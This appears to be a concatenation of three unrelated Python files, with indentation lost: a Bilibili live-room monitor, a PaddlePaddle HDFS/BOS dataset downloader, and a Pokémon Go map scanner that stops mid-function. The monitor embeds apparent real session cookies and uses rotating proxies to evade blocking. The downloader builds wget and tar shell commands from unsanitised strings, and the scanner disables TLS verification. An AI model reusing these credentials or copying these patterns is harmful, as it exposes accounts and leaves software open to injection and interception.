headers={"APP-KEY": "iphone","Accept": "*/*","Accept-Encoding": "gzip","Accept-Language": "zh-cn","Buvid": "a3ed675c322d0d658f8a0e69711fb011","Display-ID": "1836737-1562074723","ENV": "prod","User-Agent": "bili-universal/8680 CFNetwork/976 Darwin/18.2.0",}
'''
headers={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
cookies={
"Cookie": "DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=20accd85%2C1566356211%2C0d93fe71; bili_jct=f10fa7a864b930767ec42e4f42968c4a; sid=4hbm9tko; Buvid=a3ed675c322d0d658f8a0e69711fb011; LIVE_BUVID=AUTO1915506501046439; buvid3=FC7A064A-214F-42CD-A34B-E62B8E670B1248780infoc; finger=50e304e7; Hm_lvt_8a6e55dbd2870f0f5bc9194cddf32a02=1557239028"
}
'''
s.headers.update(headers)
s.cookies.update(cookies)
#proxies = None#getip('国内')
while not streamip:
time.sleep(1)
ip = streamip[random.randint(0,len(streamip) - 1)]
proxies = {'https':ip,'http':ip}
print("getrec",proxies)
while True:
xx = time.time()
try:
t=1
#url = 'http://api.live.bilibili.com/relation/v1/feed/feed_list?page={}&pagesize=30'.format(t)
#url = f"https://api.live.bilibili.com/xlive/app-interface/v1/relation/liveAnchor?access_key={access_key}&&build=8680&device=phone&device_name=iPhone%208&filterRule=0&mobi_app=iphone&platform=ios&qn=0&sign=9f94e7fbbcbbdb375d75d631512ad5ba&sortRule=1&statistics=%7B%22appId%22%3A1%2C%22version%22%3A%225.44.1%22%2C%22abtest%22%3A%22716%22%2C%22platform%22%3A1%7D&ts=1562074989"
url = f"http://api.live.bilibili.com/xlive/app-interface/v1/relation/liveAnchor?access_key={access_key}&actionKey=appkey&appkey=27eb53fc9058f8c3&build=8910&device=phone&device_name=iPhone%208&filterRule=0&mobi_app=iphone&platform=ios&qn=0&sign=0f9c9e3978d6bde09f2621d03c51269e&sortRule=1&statistics=%7B%22appId%22%3A1%2C%22version%22%3A%225.48.2%22%2C%22abtest%22%3A%22890_886_519%22%2C%22platform%22%3A1%7D&ts={int(time.time())}"#1562074989"
with s.get(url,proxies=proxies,timeout=3) as req:
res=req.json()
data=res.get('data')
online= []
infos={}
if not data:
contents = 'bilibili cookies 失效'
print(res)
subject = 'bilibili'
send_mail(subject,contents,password)
time.sleep(60)
else:
online.extend(str(m['roomid']) for m in data['rooms'])
for m in data['rooms']:
infos.update({str(m['roomid']):{'uname':m['uname'],'title':m['title'],'playurl':m['playurl']}})
'''
while data.get('list'):
#online.extend([str(m['roomid']) if str(m['roomid']) == m['link'].split('/')[-1] else m['link'].split('/')[-1] for m in data['list']])
#online.extend([m['link'].split('/')[-1] for m in data['list']])
online.extend(str(m['roomid']) for m in data['list'])
for m in data['list']:
infos.update({str(m['roomid']):{'uname':m['uname'],'title':m['title']}})
t+=1
url = 'http://api.live.bilibili.com/relation/v1/feed/feed_list?page={}&pagesize=30'.format(t)
data = s.get(url,proxies=proxies,timeout=10).json().get('data')
'''
f=open('/root/u/user.txt','r')
uids=list(set(f.read().splitlines()))
wanted = [m for m in list(set(online)) if (m in uids and m not in recording)]
if len(wanted):
if firstnew:
print('rec 更新')
firstnew=0
continue
sys.stdout.write("\033[K")
print('rec',len(wanted),wanted)
for user in wanted:
room = Room(int(user),sUser=infos[user]['uname'],sTitle=infos[user]['title'],sUrl=None)#infos[user]['playurl'])
thread = threading.Thread(target = checkrun,name=infos[user]['uname'],args = (room,),daemon = True)
thread.start()
if testt == '1':
thread.join()
f.close()
except Exception as e:
print(e)
if streamip:
ip = streamip[random.randint(0,len(streamip) - 1)]
else:
oip = allips.pop(0)
ip = oip['proxy']
allips.append(oip)
print(ip)
proxies = {'https':ip,'http':ip}
#print(req)
print("getrec",proxies)
if '403' in str(e):
getcookies()
yy = time.time()
if 'f' in locals():
f.close()
print('')
sys.stdout.write('\033[K')
sys.stdout.write('\033[F')
print('\nrec updated',yy-xx,'s')
'''
if count<=0:
count=5
snapshot = tracemalloc.take_snapshot()
top_stats = snapshot.statistics('lineno')
for stat in top_stats[:2]:
sys.stdout.write('\033[K')
print(stat)
sys.stdout.write('\033[2A')
else:
count-=1
'''
sys.stdout.write('\033[F')
sys.stdout.write('\033[F')
time.sleep(random.randint(0,2))
def getfollow():
global cookies
headers ={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
'''
cookies={
"Cookie": "DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=20accd85%2C1566356211%2C0d93fe71; bili_jct=f10fa7a864b930767ec42e4f42968c4a; sid=4hbm9tko; Buvid=a3ed675c322d0d658f8a0e69711fb011; LIVE_BUVID=AUTO1915506501046439; buvid3=FC7A064A-214F-42CD-A34B-E62B8E670B1248780infoc; finger=50e304e7; Hm_lvt_8a6e55dbd2870f0f5bc9194cddf32a02=1557239028"
}
'''
s = requests.session()
s.keep_alive = False
s.headers.update(headers)
s.cookies.update(cookies)
if streamip:
ip = random.choice(streamip)
else:
ip = None
proxies = {'http':ip}
while True:
try:
curl='http://api.bilibili.com/x/relation/tags'
with s.get(curl,proxies=proxies,timeout=10) as r:
cdata = r.json()['data']
flist = [m['tagid'] for m in cdata if (m['name'] =='直播' or m['name']=='舞蹈')]
break
except:
print('get tags error,use old')
flist = [96907,114130]
break
time.sleep(10)
while True:
x=time.time()
fmid=[]
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=10)
_process_pool = concurrent.futures.ThreadPoolExecutor(max_workers=10)
atasks = []
try:
for i in flist:
t=1
furl = 'http://api.bilibili.com/x/relation/tag?mid=1836737&tagid={}&pn={}&ps=50'.format(i,t)
with s.get(furl,proxies=proxies,timeout=10) as res:
fdata = res.json()
fdata = fdata['data']
while fdata:
fmid.extend([m['mid'] for m in fdata])
t+=1
furl = 'http://api.bilibili.com/x/relation/tag?mid=1836737&tagid={}&pn={}&ps=50'.format(i,t)
with s.get(furl,proxies=proxies,timeout=10) as res:
fdata = res.json()['data']
fmid = list(set(fmid))
with open('/root/u/checked_fmid.txt','a+') as f:
f.seek(0)
checked_fmid = f.read().splitlines()
f2 = open ('/root/u/user.txt','r+')
uids=list(set(f2.read().splitlines()))
for i in fmid:
if str(i) not in checked_fmid:
atasks.append(get_spider(i,loop,thread_pool,f2,uids,_process_pool,s))
if atasks:
loop.run_until_complete(asyncio.wait(atasks))
y=time.time()
sys.stdout.write('\033[K')
print('follow update',y-x,'s')
sys.stdout.write('\033[F')
except Exception as e:
#print(fdata)
#traceback.print_exc()
if streamip:
ip = random.choice(streamip)
else:
ip = get_proxy()
proxies ={'http':ip}
#print(e)
print('getfollow',proxies)
if 'f2' in locals():
f2.close()
loop.close()
thread_pool.shutdown()
_process_pool.shutdown()
time.sleep(random.randint(1,3))
async def get_spider(i,loop,thread_pool,f2,uids,_process_pool,s):
rurl = 'http://api.live.bilibili.com/room/v1/Room/getRoomInfoOld?mid={}'.format(i)
data = await loop.run_in_executor(thread_pool,functools.partial(_request,rurl,s))
await loop.run_in_executor(_process_pool,functools.partial(get_header,data,f2,uids,i))
def _request(rurl,s):
proxyg = {}
t = 10
while t:
try:
with s.get(rurl,proxies=proxyg,allow_redirects=False,timeout=10) as res:
return res.json()['data']
except Exception:
ip = get_proxy()
proxyg={'https':ip,'http':ip}#getip('国内')
sys.stdout.write('\rget loopreq '+ip)
sys.stdout.flush()
return None
def get_header(data,f2,uids,i):
if data:
roomid = str(data['roomid'])
else:
roomid = None
#live = 'https://live.bilibili.com/'+roomid
'''
live = sAPI4.format(oroomid)
fake = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' }
try:
jsons= requests.get(live,headers=fake,allow_redirects=False).json()
rdata=jsons['data']
#if rheader.get('Location'):
# roomid = rheader['Location'].split('/')[-1]
roomid = str(rdata['short_id'] if rdata['short_id'] else rdata['room_id'])
except:
print(oroomid,jsons)
return
'''
if roomid:
if roomid not in uids:
with open ('/root/u/user.txt','a') as f2:
f2.write(roomid +'\n')
with open ('/root/u/checked_fmid.txt','a+') as ff:
ff.seek(0)
if str(i) not in ff.read().splitlines():
print(i,'写入')
ff.write(str(i)+'\n')
def check_useful():
global allips
print('检查可用ip')
queue = Queue.Queue()
for i in range(50):
t = mythread(queue)
t.setDaemon(True)
t.start()
retryck = 0
while True:
while len(streamip) > 10 or retryck > 0:
sys.stdout.write("\r\033[Kip目前剩余:"+str(len(streamip)))
time.sleep(5)
retryck -= 1
retryck = 60
ips = None
while not ips:
try:
with requests.get("http://127.0.0.1:5010/get_all/",timeout = 5) as res:
ips = res.json()
except:
time.sleep(0.1)
allips = ips
for ip in ips:
queue.put(ip.get('proxy'))
queue.join()
ipnum = len(streamip)
if ipnum <= 5:
continue
subject = "bilibili"
contents = "有效ip只有{}个,建议检查".format(ipnum)
send_mail(subject,contents,password)
sys.stdout.write("\r\033[K有效ip:"+str(ipnum)+" 总量:"+str(len(allips)))
#time.sleep(20)
class mythread(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue=queue
def run(self):
url = 'http://api.live.bilibili.com/room/v1/Room/playUrl?cid=279430&otype=json&platform=web&qn=4'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Referer': 'https://live.bilibili.com/279430'}
while 1:
iip = self.queue.get()
#print(self.queue.qsize(),iip)
proxies = {'http':iip}
try:
nogood=1
r = requests.get(url,headers=headers,proxies = proxies,timeout = (3,5),allow_redirects=False)
rjson = r.json()
if rjson['data']['accept_quality']:
nogood = 0
durl = str(rjson['data']['durl'])
if 'live-ws' in durl:
nogood = 1
if nogood:
if iip in streamip:
streamip.remove(iip)
else:
if not iip in streamip:
streamip.append(iip)
except Exception as e:
#print(e)
if iip in streamip:
streamip.remove(iip)
finally:
if 'r' in locals():
r.close()
self.queue.task_done()
def run():
global ROOMS
global USERS
sIds = ROOMS or '';
aIds = sIds.split(',');
sUsers = USERS or '';
aUsers = sUsers.split(',');
#synMonitor(aIds, aUsers);
gf = threading.Thread(target=getfollow,name = "getfollow",daemon=True)
gf.start()
ch_us = threading.Thread(target=check_useful,name="checkip",daemon=True)
ch_us.start()
newgetonline()
def parseArg():
global ROOMS, USERS, FILEDIR, DEBUGLEVEL, SCRIPT, COMMAND, INTERVAL
global log
parser = argparse.ArgumentParser(description='simultaneously monitor status of plural rooms at live.bilibili.com, and download streaming ones');
parser.add_argument('-r', '--room',
help='IDs of rooms to listen, separated by comma'
);
parser.add_argument('-u', '--user',
help='IDs of users who host the rooms to listen, separated by comma'
);
parser.add_argument('-d', '--dir',
help='directory to be downloaded into'
);
parser.add_argument('-v', '--verbose',
action='store_true',
help='show verbose debug information'
);
parser.add_argument('-s', '--script',
help='python scripts to be executed after a successful download; the downloaded file path will be passed as the first script argument ( sys.argv[1] )'
);
parser.add_argument('-c', '--command',
help='the command to be executed after a successful download; the downloaded file path will replace "{0}" within the command, using format syntax ( COMMAND.format(FILEPATH) )'
);
parser.add_argument('-i', '--interval',
type=int,
help='the interval, in seconds, between each status poll round'
);
args = parser.parse_args();
ROOMS = '{},{}'.format(ROOMS or '', args.room or '');
USERS = '{},{}'.format(USERS or '', args.user or '');
FILEDIR = args.dir or FILEDIR or '';
#if (args.verbose):
# DEBUGLEVEL = logging.DEBUG;
#else:
# DEBUGLEVEL = logging.INFO;
#log.setLevel(DEBUGLEVEL);
SCRIPT = args.script or SCRIPT or '';
COMMAND = args.command or COMMAND or '';
INTERVAL = args.interval or INTERVAL or 20;
print('passed command line arguments: {}'.format(
{key: value for (key, value) in vars(args).items() if value is not None}
));
return True;
def getcookies():
global cookies
global access_key
while 1:
try:
os.system("python3 bilibili.py")
try:
config = toml.load('config.toml')
except:
print("无法加载config")
return
line = config['user']['account'].splitlines()[0]
pairs={}
for pair in line.strip(";").split(";"):
if len(pair.split("=")) == 2:
key, value = pair.split("=")
pairs[key] = value
cookie = all(key in pairs for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])
cookies={'cookie':";".join(f"{key}={value}" for key, value in pairs.items() if key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])}
access_key = pairs['access_token']
return cookies
except:
pass
def main():
try:
parseArg();
getcookies()
run();
except KeyboardInterrupt as e:
display('\nexiting...');
if __name__ == '__main__':
main();
|
downloader.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.distributed.fleet.utils.fs import HDFSClient
import time
import paddle.distributed.fleet as fleet
import socket
import sys
import hashlib
from .barrier_server_impl import BarrierServer
from .barrier_client_impl import BarrierClient
from .env import is_first_worker, get_node_info
import sysconfig
import multiprocessing
import yaml
import os
def net_is_used(port, ip='127.0.0.1'):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
s.shutdown(2)
return True
except:
return False
def get_md5(file_path):
hash_md5 = hashlib.md5()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def check_exists(filelist, local_path):
with open("{}/filelist.txt".format(local_path), 'r') as fin:
for line in fin:
current_file = line.split(' ')[0]
current_md5 = line.split(' ')[1].strip()
if current_file in filelist:
if (not os.path.exists("{}/{}".format(
local_path, current_file))) or get_md5("{}/{}".format(
local_path, current_file)) != current_md5:
return True
return False
def get_file_shard(node_id, node_num, local_path):
while not os.path.exists('{}/filelist.txt'.format(local_path)):
time.sleep(3)
full_list = []
with open("{}/filelist.txt".format(local_path), 'r') as fin:
for line in fin:
full_list.append(line.split(' ')[0])
return full_list[node_id::node_num]
class Downloader(object):
def __init__(self):
self.need_barrier = False
def download_from_hdfs(self,
fs_yaml=None,
local_path="./",
shard_num=-1,
shard_id=-1,
process_num=10):
"""
Download from hdfs
The configurations are configured in fs_yaml file:
TODO: add example and yaml argument fields introduction
"""
def multi_download(client,
hdfs_path,
local_path,
filelist,
process_num=process_num):
def _subprocess_download(files):
for ff in files:
client.download('{}/{}'.format(hdfs_path, ff),
'{}/{}'.format(local_path, ff))
cmd = "tar -xf {}/{} -C {}".format(local_path, ff,
local_path)
os.system(cmd)
dir_per_process = len(filelist) / process_num
procs = []
for i in range(process_num):
process_filelist = filelist[i::process_num]
p = multiprocessing.Process(
target=_subprocess_download, args=(process_filelist, ))
procs.append(p)
p.start()
for proc in procs:
proc.join()
if os.environ.get('PADDLE_TRAINER_ENDPOINTS') is not None:
endpoints = os.environ.get('PADDLE_TRAINER_ENDPOINTS').split(",")
current_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
self.server_endpoint = endpoints[0]
self.server_port = self.server_endpoint.split(":")[1]
self.barrier_server = BarrierServer()
if current_endpoint == self.server_endpoint:
while net_is_used(self.server_port):
time.sleep(3)
self.barrier_server.start_server_in_background(
endpoint=self.server_endpoint, worker_endpoints=endpoints)
self.need_barrier = True
if is_first_worker():
if not os.path.exists(local_path):
os.system('mkdir {}'.format(local_path))
_, ext = os.path.splitext(fs_yaml)
assert ext in ['.yml', '.yaml'], "only support yaml files for now"
with open(fs_yaml) as f:
cfg = yaml.load(f, Loader=yaml.Loader)
if "hadoop_home" in cfg:
self.hadoop_home = cfg["hadoop_home"]
elif "HADOOP_HOME" in os.environ:
self.hadoop_home = os.environ['HADOOP_HOME']
elif os.system('which hadoop') == 0:
path = os.popen("which hadoop").readlines()[0].rstrip()
self.hadoop_home = os.path.dirname(os.path.dirname(path))
if self.hadoop_home:
print("HADOOP_HOME: " + self.hadoop_home)
if "fs.default.name" in cfg and "hadoop.job.ugi" in cfg:
self.hdfs_configs = {
"fs.default.name": cfg["fs.default.name"],
"hadoop.job.ugi": cfg["hadoop.job.ugi"]
}
java_home = ''
if "java_home" in cfg:
java_home = cfg['java_home']
os.environ['JAVA_HOME'] = java_home
if "data_path" in cfg:
hdfs_path = cfg["data_path"]
else:
raise Exception("ERROR: Please figure your data path in AFS.")
client = HDFSClient(self.hadoop_home, self.hdfs_configs)
if is_first_worker():
if not (client.is_exist('{}/meta.txt'.format(hdfs_path)) and
client.is_exist('{}/filelist.txt'.format(hdfs_path))):
raise Exception(
"ERROR: Your data dir should include filelist.txt and meta.txt"
)
if not os.path.exists('{}/filelist.txt'.format(local_path)):
client.download('{}/filelist.txt'.format(hdfs_path),
'{}/filelist.txt'.format(local_path))
if not os.path.exists('{}/meta.txt'.format(local_path)):
client.download('{}/meta.txt'.format(hdfs_path),
'{}/meta.txt'.format(local_path))
with open('{}/meta.txt'.format(local_path), 'r') as fin:
for line in fin:
current_file = line.strip()
if not os.path.exists('{}/{}'.format(local_path,
current_file)):
client.download(
'{}/{}'.format(hdfs_path, current_file),
'{}/{}'.format(local_path, current_file))
if shard_num > 0:
assert (
shard_id >= 0,
"Please provide worker index by fleet.worker_index() if you want to download sharded data on each machine"
)
self.filelist = get_file_shard(shard_id, shard_num, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(client, hdfs_path, local_path, self.filelist)
else:
if is_first_worker():
self.filelist = get_file_shard(0, 1, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(client, hdfs_path, local_path,
self.filelist)
if self.need_barrier:
client = BarrierClient()
client.server_endpoint = self.server_endpoint
client.my_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
client.connect()
client.barrier()
if client.my_endpoint == self.server_endpoint:
time.sleep(10)
self.barrier_server.close_server()
return local_path
def download_from_bos(self,
fs_yaml=None,
local_path="./",
shard_num=-1,
shard_id=-1,
process_num=10):
def multi_download(bos_path,
local_path,
filelist,
process_num=process_num):
def _subprocess_download(files):
for ff in files:
os.system("wget -q -P {} --no-check-certificate {}/{}".
format(local_path, bos_path, ff))
cmd = "tar -xf {}/{} -C {}".format(local_path, ff,
local_path)
os.system(cmd)
dir_per_process = len(filelist) / process_num
procs = []
for i in range(process_num):
process_filelist = filelist[i::process_num]
p = multiprocessing.Process(
target=_subprocess_download, args=(process_filelist, ))
procs.append(p)
p.start()
for proc in procs:
proc.join()
if os.environ.get('PADDLE_TRAINER_ENDPOINTS') is not None:
endpoints = os.environ.get('PADDLE_TRAINER_ENDPOINTS').split(",")
current_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
self.server_endpoint = endpoints[0]
self.server_port = self.server_endpoint.split(":")[1]
self.barrier_server = BarrierServer()
if current_endpoint == self.server_endpoint:
while net_is_used(self.server_port):
time.sleep(3)
self.barrier_server.start_server_in_background(
endpoint=self.server_endpoint, worker_endpoints=endpoints)
self.need_barrier = True
if is_first_worker():
if not os.path.exists(local_path):
os.system('mkdir {}'.format(local_path))
yaml_file = fs_yaml.split('/')[-1]
if not os.path.exists(yaml_file):
if fs_yaml == None:
raise Exception(
"Error: you should provide a yaml to download data from bos, you can find yaml examples in the following links:"
)
if is_first_worker():
os.system("wget -q --no-check-certificate {}".format(fs_yaml))
if not os.path.exists(yaml_file):
raise Exception(
"Error: If you provide a url, please check if your url is valid and is able to access; otherwise, please check if the yaml file is exists in your local path."
)
else:
while not os.path.exists(yaml_file):
time.sleep(1)
_, ext = os.path.splitext(fs_yaml)
assert ext in ['.yml', '.yaml'], "only support yaml files for now"
with open(yaml_file) as f:
cfg = yaml.load(f, Loader=yaml.Loader)
if 'bos_path' in cfg:
bos_path = cfg["bos_path"]
else:
raise Exception("ERROR: Please figure your data path in BOS.")
if is_first_worker():
try:
os.system(
"wget -q -P {} --no-check-certificate {}/filelist.txt".
format(local_path, bos_path))
os.system("wget -q -P {} --no-check-certificate {}/meta.txt".
format(local_path, bos_path))
except:
raise Exception(
"ERROR: Your data dir should include filelist.txt and meta.txt"
)
with open('{}/meta.txt'.format(local_path), 'r') as fin:
for line in fin:
current_file = line[:-1]
os.system("wget -q -P {} --no-check-certificate {}/{}".
format(local_path, bos_path, current_file))
if shard_num > 0:
assert (
shard_id >= 0,
"Please provide worker index by fleet.worker_index() if you want to download sharded data on each machine"
)
self.filelist = get_file_shard(shard_id, shard_num, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(bos_path, local_path, self.filelist)
else:
if is_first_worker():
self.filelist = get_file_shard(0, 1, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(bos_path, local_path, self.filelist)
if self.need_barrier:
client = BarrierClient()
client.server_endpoint = self.server_endpoint
client.my_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
client.connect()
client.barrier()
if client.my_endpoint == self.server_endpoint:
time.sleep(10)
self.barrier_server.close_server()
return local_path
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
